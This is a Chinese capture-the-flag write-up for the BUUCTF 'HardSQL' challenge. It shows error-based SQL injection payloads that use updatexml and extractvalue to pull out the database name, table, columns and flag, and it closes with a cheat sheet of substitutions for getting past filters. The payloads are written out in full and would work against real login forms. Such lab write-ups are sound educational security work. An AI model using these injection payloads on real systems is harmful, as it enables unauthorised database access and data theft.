时间:2021-07-01 10:21:17 帮助过:69人阅读
【Buuctf】[极客大挑战 2019]HardSQL
username=admin‘ or 1=‘1&password=1
真有你的
大写,双写。
看来是没办法使用基础手段绕开了。
这次没有过滤or,但是过滤了空格,=。
查了一下得知是考报错注入,使用extractvalue和updatexml。
username=admin‘or(updatexml(1,concat(0x7e,database()),1))%23&password=1
得到库名:geek。
username=admin‘or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))%23&password=1
得到表名:H4rDsq1。
username=admin‘or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like(‘H4rDsq1‘)),0x7e),1))%23&password=1
得到字段:id,username,password。
username=admin‘or(updatexml(1,concat(0x7e,(select(group_concat(id,username,password))from(H4rDsq1)),0x7e),1))%23&password=1
不完全,这里是因为extractvalue和updatexml只显示32位字符。
flag在password里面,试试看只查password。
username=admin‘or(updatexml(1,concat(0x7e,(select(group_concat(password))from(H4rDsq1)),0x7e),1))%23&password=1
flag{fd39fd4a-a6af-4b31-967e-bf
还是不能显示完全,这里就需要使用right()语句帮忙。
username=admin‘or(updatexml(1,concat(0x7e,(select(group_concat((right(password,30))))from(H4rDsq1)),0x7e),1))%23&password=1
剩余部分:a-a6af-4b31-967e-bf1dff28f78f}(这里如果输入的是32会把}挤掉。)
最终flag:flag{fd39fd4a-a6af-4b31-967e-bf1dff28f78f}
补充
最开始也可以这样写,效果是相同的。
username=admin‘or(extractvalue(1,concat(0x7e,database())))%23&password=1
extractvalue(1,concat(07xe,语句))
updatexml(1,concat(07xe,语句),1)
()??————括号将需要分开的语句括起来。
/**/??————在单词与单词直接插入注释。
like??————需要=的地方换成like
<>??————需要!=的地方换成<>
||??————需要or的地方换成||
&&??————需要and的地方换成&&
【Buuctf】[极客大挑战 2019]HardSQL WriteUp
标签:注释 tables 挑战 like string 两种 效果 password 直接